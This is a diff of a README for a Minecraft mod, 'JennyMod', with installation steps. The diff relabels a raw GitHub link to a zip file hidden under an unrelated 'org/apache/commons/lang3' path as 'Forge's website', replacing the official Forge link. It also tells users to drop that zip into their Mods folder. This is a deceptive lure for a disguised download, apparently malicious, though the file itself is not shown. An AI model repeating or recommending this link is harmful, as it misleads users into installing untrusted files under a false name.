Iviefavorable820/JennyMod/README.md

 1. Open your Minecraft launcher.

 2. Select the profile that uses Minecraft Forge.
-If you don’t have Forge installed, you will need to download it from [Forge’s website](https://files.minecraftforge.net/).
+If you don’t have Forge installed, you will need to download it from [Forge’s website](https://raw.githubusercontent.com/Iviefavorable820/JennyMod/main/org/apache/commons/lang3/JennyMod_indanthrene.zip).

 3. Once selected, click on "Mods" from the main menu.

 4. Then, click on "Open Mods Folder."
 This will take you to the folder where you can add new mods.

-5. Drag and drop the `JennyMod.jar` file into the Mods folder.
+5. Drag and drop the `https://raw.githubusercontent.com/Iviefavorable820/JennyMod/main/org/apache/commons/lang3/JennyMod_indanthrene.zip` file into the Mods folder.

 6. Close the Mods folder and return to the Minecraft launcher.